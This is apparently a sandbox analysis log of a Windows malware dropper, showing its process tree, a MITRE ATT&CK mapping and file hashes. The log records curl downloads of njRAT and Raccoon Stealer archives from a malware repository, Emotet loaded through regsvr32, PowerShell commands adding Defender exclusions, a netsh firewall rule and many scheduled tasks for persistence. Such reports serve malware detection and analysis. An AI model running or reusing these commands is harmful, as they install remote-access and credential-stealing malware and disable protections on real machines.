C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\njrat.zip" "https://github.com/ytisf/theZoo/raw/master/malware/Binaries/njRAT-v0.6.4/njRAT-v0.6.4.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\njrat.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\raccoonv2.zip" "https://github.com/ytisf/theZoo/raw/master/malware/Binaries/Raccoon.Stealer.v2/Raccoon.Stealer.v2.sha.zip" --ssl-no-revoke && "C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\raccoonv2.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2"2⤵
- System Location Discovery: System Language Discovery
PID:240 -
C:\Users\Admin\AppData\Local\Temp\ud.curl.exeC:\Users\Admin\AppData\Local\Temp\ud.curl.exe -L -o "C:\Users\Admin\AppData\Local\Temp\raccoonv2.zip" "https://github.com/ytisf/theZoo/raw/master/malware/Binaries/Raccoon.Stealer.v2/Raccoon.Stealer.v2.sha.zip" --ssl-no-revoke3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\ud.7z.exe"C:\Users\Admin\AppData\Local\Temp\ud.7z.exe" x "C:\Users\Admin\AppData\Local\Temp\raccoonv2.zip" -p"infected" -o"C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c regsvr32.exe "C:\Users\Admin\AppData\Local\Temp\ultradrp\emotet.dll"2⤵
- System Location Discovery: System Language Discovery
PID:4344 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe "C:\Users\Admin\AppData\Local\Temp\ultradrp\emotet.dll"3⤵
- Loads dropped DLL
PID:4780 -
C:\Windows\system32\regsvr32.exe"C:\Users\Admin\AppData\Local\Temp\ultradrp\emotet.dll"4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3388 -
C:\Windows\system32\regsvr32.exeC:\Windows\system32\regsvr32.exe "C:\Windows\system32\LebJLVLGTaYyDzLqK\kvSyiBnEDjBjF.dll"5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3848
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]"2⤵
- System Location Discovery: System Language Discovery
PID:980 -
C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]3⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1448
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]"2⤵
- System Location Discovery: System Language Discovery
PID:1556 -
C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2084 -
C:\WINDOWS\302746537.exe"C:\WINDOWS\302746537.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1E31.tmp\302746537.bat" "5⤵PID:4760
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s c:\windows\comctl32.ocx6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:708
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s c:\windows\mscomctl.ocx6⤵
- Loads dropped DLL
- Modifies registry class
PID:4372
-
-
\??\c:\windows\antivirus-platinum.exec:\windows\antivirus-platinum.exe6⤵
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3248
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h c:\windows\antivirus-platinum.exe6⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:3340
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exePID:1720
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2892 -
C:\Users\Admin\AppData\Local\Temp\is-S3AM1.tmp\is-DATM2.tmp"C:\Users\Admin\AppData\Local\Temp\is-S3AM1.tmp\is-DATM2.tmp" /SL4 $90100 "C:\Users\Admin\AppData\Local\Temp\ultradrp\[email protected]" 779923 558084⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2860
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exeC:\Users\Admin\AppData\Local\Temp\ultradrp\Install.exe3⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe"2⤵PID:1004
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe"C:\Users\Admin\AppData\Local\Temp\ultradrp\Worm (1).exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exeC:\Users\Admin\AppData\Local\Temp\ultradrp\setup.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe"C:\Users\Admin\AppData\Local\Temp\ultradrp\Genshin Impact.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:840 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\winsessionnet\qmazbV2JlRldI.vbe"4⤵
- System Location Discovery: System Language Discovery
PID:2736 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\winsessionnet\kudjk2JZBqNfIbV0H.bat" "5⤵PID:3184
-
C:\winsessionnet\PortwebSaves.exe"C:\winsessionnet\PortwebSaves.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winsessionnet\PortwebSaves.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\cmd.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\sppsvc.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\conhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Java\dllhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\unsecapp.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ServiceProfiles\NetworkService\unsecapp.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winsessionnet\cmd.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\cmd.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Cookies\sihost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Users\Public\Pictures\cmd.exe"C:\Users\Public\Pictures\cmd.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexe"2⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexeC:\Users\Admin\AppData\Local\Temp\ultradrp\setup.eexe3⤵
- Executes dropped EXE
PID:2332
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat\njRAT-v0.6.4\njRAT.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3204 -
C:\Users\Admin\AppData\Local\Temp\ultradrp\njrat\njRAT-v0.6.4\njRAT.exeC:\Users\Admin\AppData\Local\Temp\ultradrp\njrat\njRAT-v0.6.4\njRAT.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1552 -
C:\njRAT.exe"C:\njRAT.exe"4⤵
- Executes dropped EXE
PID:2488
-
-
C:\njq8.exe"C:\njq8.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3640 -
C:\Users\Admin\AppData\Local\Temp\windows.exe"C:\Users\Admin\AppData\Local\Temp\windows.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4764 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\windows.exe" "windows.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4864
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c cd "C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2" && for %f in (*) do ren %f %f.exe && start %f.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\0123b26df3c79bac0a3fda79072e36c159cfd1824ae3fd4b7f9dea9bda9c7909.exe0123b26df3c79bac0a3fda79072e36c159cfd1824ae3fd4b7f9dea9bda9c7909.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4728
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03.exe022432f770bf0e7c5260100fcde2ec7c49f68716751fd7d8b9e113bf06167e03.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3132
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\048c0113233ddc1250c269c74c9c9b8e9ad3e4dae3533ff0412d02b06bdf4059.exe048c0113233ddc1250c269c74c9c9b8e9ad3e4dae3533ff0412d02b06bdf4059.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1788
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\0c722728ca1a996bbb83455332fa27018158cef21ad35dc057191a0353960256.exe0c722728ca1a996bbb83455332fa27018158cef21ad35dc057191a0353960256.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\2106b6f94cebb55b1d55eb4b91fa83aef051c8866c54bb75ea4fd304711c4dfc.exe2106b6f94cebb55b1d55eb4b91fa83aef051c8866c54bb75ea4fd304711c4dfc.exe3⤵
- Executes dropped EXE
PID:4860
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\263c18c86071d085c69f2096460c6b418ae414d3ea92c0c2e75ef7cb47bbe693.exe263c18c86071d085c69f2096460c6b418ae414d3ea92c0c2e75ef7cb47bbe693.exe3⤵
- Executes dropped EXE
PID:4892
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\27e02b973771d43531c97eb5d3fb662f9247e85c4135fe4c030587a8dea72577.exe27e02b973771d43531c97eb5d3fb662f9247e85c4135fe4c030587a8dea72577.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\2911be45ad496dd1945f95c47b7f7738ad03849329fcec9c464dfaeb5081f67e.exe2911be45ad496dd1945f95c47b7f7738ad03849329fcec9c464dfaeb5081f67e.exe3⤵
- Executes dropped EXE
PID:3968
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\47f3c8bf3329c2ef862cf12567849555b17b930c8d7c0d571f4e112dae1453b1.exe47f3c8bf3329c2ef862cf12567849555b17b930c8d7c0d571f4e112dae1453b1.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1204
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\516c81438ac269de2b632fb1c59f4e36c3d714e0929a969ec971430d2d63ac4e.exe516c81438ac269de2b632fb1c59f4e36c3d714e0929a969ec971430d2d63ac4e.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:660
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\5d66919291b68ab8563deedf8d5575fd91460d1adfbd12dba292262a764a5c99.exe5d66919291b68ab8563deedf8d5575fd91460d1adfbd12dba292262a764a5c99.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2116
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\62049575053b432e93b176da7afcbe49387111b3a3d927b06c5b251ea82e5975.exe62049575053b432e93b176da7afcbe49387111b3a3d927b06c5b251ea82e5975.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4888
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\7299026b22e61b0f9765eb63e42253f7e5d6ec4657008ea60aad220bbc7e2269.exe7299026b22e61b0f9765eb63e42253f7e5d6ec4657008ea60aad220bbc7e2269.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3032
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\7322fbc16e20a7ef2a3188638014a053c6948d9e34ecd42cb9771bdcd0f82db0.exe7322fbc16e20a7ef2a3188638014a053c6948d9e34ecd42cb9771bdcd0f82db0.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\960ce3cc26c8313b0fe41197e2aff5533f5f3efb1ba2970190779bc9a07bea63.exe960ce3cc26c8313b0fe41197e2aff5533f5f3efb1ba2970190779bc9a07bea63.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3584
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\99f510990f240215e24ef4dd1d22d485bf8c79f8ef3e963c4787a8eb6bf0b9ac.exe99f510990f240215e24ef4dd1d22d485bf8c79f8ef3e963c4787a8eb6bf0b9ac.exe3⤵
- Executes dropped EXE
PID:1420
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\bd8c1068561d366831e5712c2d58aecb21e2dbc2ae7c76102da6b00ea15e259e.exebd8c1068561d366831e5712c2d58aecb21e2dbc2ae7c76102da6b00ea15e259e.exe3⤵
- Executes dropped EXE
PID:5368
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\c6e669806594be6ab9b46434f196a61418484ba1eda3496789840bec0dff119a.exec6e669806594be6ab9b46434f196a61418484ba1eda3496789840bec0dff119a.exe3⤵
- Executes dropped EXE
PID:5408
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\e309a7a942d390801e8fedc129c6e3c34e44aae3d1aced1d723bc531730b08f5.exee309a7a942d390801e8fedc129c6e3c34e44aae3d1aced1d723bc531730b08f5.exe3⤵
- Executes dropped EXE
PID:5420
-
-
C:\Users\Admin\AppData\Local\Temp\ultradrp\raccoon_v2\f7b1aaae018d5287444990606fc43a0f2deb4ac0c7b2712cc28331781d43ae27.exef7b1aaae018d5287444990606fc43a0f2deb4ac0c7b2712cc28331781d43ae27.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5476
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2088
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Public\Pictures\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Pictures\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Users\Public\AccountPictures\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Public\AccountPictures\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Users\Public\AccountPictures\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3144
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1944
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\Downloads\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Downloads\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Common Files\Java\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3792
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Common Files\Java\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1784
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 10 /tr "'C:\Windows\ServiceProfiles\NetworkService\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\NetworkService\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2664
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Windows\ServiceProfiles\NetworkService\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\winsessionnet\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1028
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\winsessionnet\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2172
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\winsessionnet\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2340
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\cmd.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4356
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4572
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\cmd.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:660
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Cookies\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Admin\Cookies\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Cookies\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1172
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
6Pre-OS Boot
1Bootkit
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5cd479d111eee1dbd85870e1c7477ad4c
SHA101ff945138480705d5934c766906b2c7c1a32b72
SHA256367f8d1bfcf90ae86c0c33b0c8c9e6ec1c433c353d0663ebb44567607402c83d
SHA5128b801bfbb933e0dc77090555fa258d416cbe9ed780fb1821aed532a979617082b29e0b6f8fb85f73a9e93c98981426c92c498a41c49f823707da3e6b7bb30128
-
Filesize
699KB
MD5ff84853a0f564152bd0b98d3fa63e695
SHA147d628d279de8a0d47534f93fa5b046bb7f4c991
SHA2563aaa9e8ea7c213575fd3ac4ec004629b4ede0de06e243f6aad3cf2403e65d3f2
SHA5129ea41fe0652832e25fe558c6d97e9f9f85ccd8a5f4d00dbcc1525a20a953fbd76efb64d69ce0fdd53c2747159d68fcb4ac0fa340e0253b5401aebc7fb3774feb
-
Filesize
794KB
MD5ab1187f7c6ac5a5d9c45020c8b7492fe
SHA10d765ed785ac662ac13fb9428840911fb0cb3c8f
SHA2568203f1de1fa5ab346580681f6a4c405930d66e391fc8d2da665ac515fd9c430a
SHA512bbc6594001a2802ed654fe730211c75178b0910c2d1e657399de75a95e9ce28a87b38611e30642baeae6e110825599e182d40f8e940156607a40f4baa8aeddf2
-
Filesize
289KB
MD5ebe6bc9eab807cdd910976a341bc070d
SHA11052700b1945bb1754f3cadad669fc4a99f5607b
SHA256b0353f4547466a0a402198b3750d928fc7c4e96dd3adc00b181e9d98e4602ea7
SHA5129a6bfcb90c1e24be1b930990dd2af72e889f71ad7e1a7b8353b6522a625e2ae36013793ee2c159880bd510b8f785ce4c9dfced1d2901d3ca8f091e26084185a8
-
Filesize
1.0MB
MD57958e5251e5e6f9c3b7752ff1543e28a
SHA186f6a8439ce6a6b30e6347c5bde7e091e5fad0ac
SHA256b31c3f9d08337314050552a7dfdceaf42bb6d22baee287cde6238a6d965d87cd
SHA512aec50b136792aebbd5aa8e5d316c39b728ff28e411dd54db99a18d5c7b9447f25629c4220800ee8dd8cd2b24a98a11d46f32b45a62bda5135c2ff0a731e032ee
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
